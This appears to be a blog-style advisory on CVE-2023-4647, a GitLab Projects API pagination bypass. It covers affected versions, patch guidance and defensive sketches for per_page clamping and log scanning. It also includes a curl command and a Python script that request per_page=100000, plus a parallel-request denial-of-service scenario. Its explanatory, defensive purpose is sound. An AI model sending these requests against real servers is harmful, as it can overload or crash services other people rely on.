CVE-2023-4647 - Exploiting GitLab Projects API Pagination Bypass and Potential DoS
If you're running a self-hosted GitLab instance, especially anything from 15.2 up until the patch releases in mid-2023, there's an important security issue you should know about: CVE-2023-4647. This flaw allowed someone to skip the built-in pagination on the Projects API. In simple terms, this could let an attacker request all your projects in one go—potentially slowing down, overwhelming, or even crashing your GitLab server.
Let's break down what this means, how it could be abused, and what you can do about it.
What Is CVE-2023-4647?
The bug is in the Projects API—that’s the part of GitLab that responds to requests like, "Hey, show me all the projects." Normally, to avoid overloading the server, GitLab paginates API responses. So, if you ask for GET /api/v4/projects, you’d get projects 1–20, then you'd need to ask again for the next 20, and so on.
But with CVE-2023-4647, attackers figured out a way to *skip* this pagination. That means, instead of 20 projects per request, you could get thousands—or all—at once, which is *not* what the GitLab folks intended!
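For contrast, here's a minimal sketch of how a well-behaved client is expected to walk the paginated endpoint—ask for page 1, then page 2, and so on until a short page signals the end. The function names here (fetch_all_projects, fake_fetch) are illustrative, and the fetch function is a stand-in rather than a real HTTP call:

```python
# Sketch of a well-behaved paginated client: request one page at a
# time and stop when a page comes back shorter than per_page.
def fetch_all_projects(fetch_page, per_page=20):
    """fetch_page(page, per_page) -> list of projects for that page."""
    projects, page = [], 1
    while True:
        batch = fetch_page(page, per_page)
        projects.extend(batch)
        if len(batch) < per_page:  # last page reached
            break
        page += 1
    return projects

# Stand-in for the real API call, simulating 45 projects server-side:
DATA = [f"project-{i}" for i in range(45)]

def fake_fetch(page, per_page):
    start = (page - 1) * per_page
    return DATA[start:start + per_page]

print(len(fetch_all_projects(fake_fetch)))  # 45, gathered 20 at a time
```

The point is that the server, not the client, decides how much data moves per round trip—which is exactly the control this CVE undermined.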
Affected Versions
- 15.2 before 16.1.5
- 16.2 before 16.2.5
- 16.3 before 16.3.1
If your instance is within the ranges above and hasn't been patched, you're at risk.
How the Bug Works: "Pagination Skipping"
GitLab's API supports a per_page parameter—normally capped at a maximum of 100. Researchers found that, by manipulating certain parameters or headers, you could bypass this restriction.
Here's how a normal API call looks:
GET /api/v4/projects?per_page=20 HTTP/1.1
Host: gitlab.example.com
Private-Token: [YOUR_PERSONAL_ACCESS_TOKEN]
But with the bug, you could try:
GET /api/v4/projects?per_page=100000 HTTP/1.1
Host: gitlab.example.com
Private-Token: [YOUR_PERSONAL_ACCESS_TOKEN]
GitLab should cap per_page to 100, but the bug let attackers get *all* projects in a single API hit.
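The fix boils down to enforcing that cap on the server side. Here's a rough illustration of the idea—this is a Python sketch of the concept, not GitLab's actual code, and MAX_PER_PAGE / DEFAULT_PER_PAGE are just the documented limits restated as constants:

```python
# Conceptual sketch (not GitLab's real implementation) of clamping
# the client-supplied per_page value to the allowed range.
MAX_PER_PAGE = 100      # documented hard cap
DEFAULT_PER_PAGE = 20   # default page size

def effective_per_page(raw_value):
    """Parse the client's per_page and clamp it to [1, MAX_PER_PAGE]."""
    try:
        value = int(raw_value)
    except (TypeError, ValueError):
        return DEFAULT_PER_PAGE
    # A vulnerable code path effectively skips this min(); the patch
    # guarantees the cap is applied no matter what the client sends.
    return max(1, min(value, MAX_PER_PAGE))

print(effective_per_page("100000"))  # 100
print(effective_per_page("20"))      # 20
```

With a clamp like this in place, asking for 100,000 projects just gets you 100.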
Example: Using curl
curl -H "Private-Token: <YOUR_TOKEN>" \
  "https://gitlab.example.com/api/v4/projects?per_page=100000"
On unpatched instances, this could send a huge response, putting strain on the server.
Why Is This Bad? (Potential DoS)
Normally, limiting per-page responses keeps the server comfortable—handling dozens of requests is easier than slamming it with all the data at once. Attackers could abuse this flaw to:
- Flood the server with massive requests, leading to Denial of Service (DoS)
- Increase CPU/memory usage, making GitLab slow or unresponsive
If you run GitLab on a small virtual machine or under tight hardware, this could even crash the service!
Practical Exploit Scenario: A DoS Attack
Imagine an attacker scripts a few API calls with ultra-high per_page values—your server tries to pack all project data into each response. Multiply that by a few parallel connections, and your GitLab instance is down for the count.
Here’s a simple way someone could test (or exploit) the bug:

import requests

GITLAB_URL = "https://gitlab.example.com"
PRIVATE_TOKEN = "YOUR_TOKEN"

# Ask for far more items than the documented cap of 100
r = requests.get(
    f"{GITLAB_URL}/api/v4/projects",
    headers={"Private-Token": PRIVATE_TOKEN},
    params={"per_page": "100000"},
    timeout=30,
)
print(r.status_code)
print(r.json())
If this returns *all* your projects, your instance is vulnerable.
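One way to make that check concrete is to compare the item count in a single response against GitLab's documented cap of 100. This heuristic only tells you something if the token can see more than 100 projects—the helper name below is illustrative, and you'd feed it len(r.json()) from the script above:

```python
PER_PAGE_CAP = 100  # documented maximum page size for GitLab's API

def exceeds_page_cap(item_count, cap=PER_PAGE_CAP):
    """True if a single response carried more items than the cap allows.

    Only meaningful when the token can see more than `cap` projects;
    a small response proves nothing either way.
    """
    return item_count > cap

print(exceeds_page_cap(100000))  # True  -> pagination cap likely bypassed
print(exceeds_page_cap(20))      # False -> cap enforced (or few projects)
```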
Official References
- CVE Detail Page
- GitLab Release Notes & Security Advisory
- HackerOne: Report #2182929
How to Protect Yourself
Upgrade GitLab
- Update to at least 16.1.5, 16.2.5, or 16.3.1
Monitor Logs
- Check for abnormal requests to /api/v4/projects
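As a rough starting point for that check, you could scan your access logs for oversized per_page values. This sketch assumes a plain-text log where the request line appears verbatim—log paths and formats vary between installs, so adjust the pattern to match yours:

```python
import re

# Match Projects API requests and capture the per_page value.
# (Hypothetical log format: adapt the regex to your actual logs.)
PATTERN = re.compile(r"/api/v4/projects\?[^\s\"]*per_page=(\d+)")

def suspicious_requests(log_lines, cap=100):
    """Return (per_page, line) pairs where per_page exceeds the cap."""
    hits = []
    for line in log_lines:
        m = PATTERN.search(line)
        if m and int(m.group(1)) > cap:
            hits.append((int(m.group(1)), line))
    return hits

sample = [
    "GET /api/v4/projects?per_page=20 HTTP/1.1",
    "GET /api/v4/projects?per_page=100000 HTTP/1.1",
]
for size, line in suspicious_requests(sample):
    print(size, line)  # flags only the oversized request
```

Repeated hits from the same client would be a strong hint someone is probing for this bug.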
Final Thoughts
CVE-2023-4647 is a great reminder that even the little things—like pagination restrictions—can have *big* impacts on security and uptime. If your GitLab is behind, patch now. Don't wait to find out the hard way that your server was an easy target for DoS.
Stay updated, stay secure!
*For more details, check out the GitLab official release notes and always watch the NVD advisory for future updates.*
Timeline
Published on: 09/01/2023 11:15:00 UTC
Last modified on: 09/07/2023 20:02:00 UTC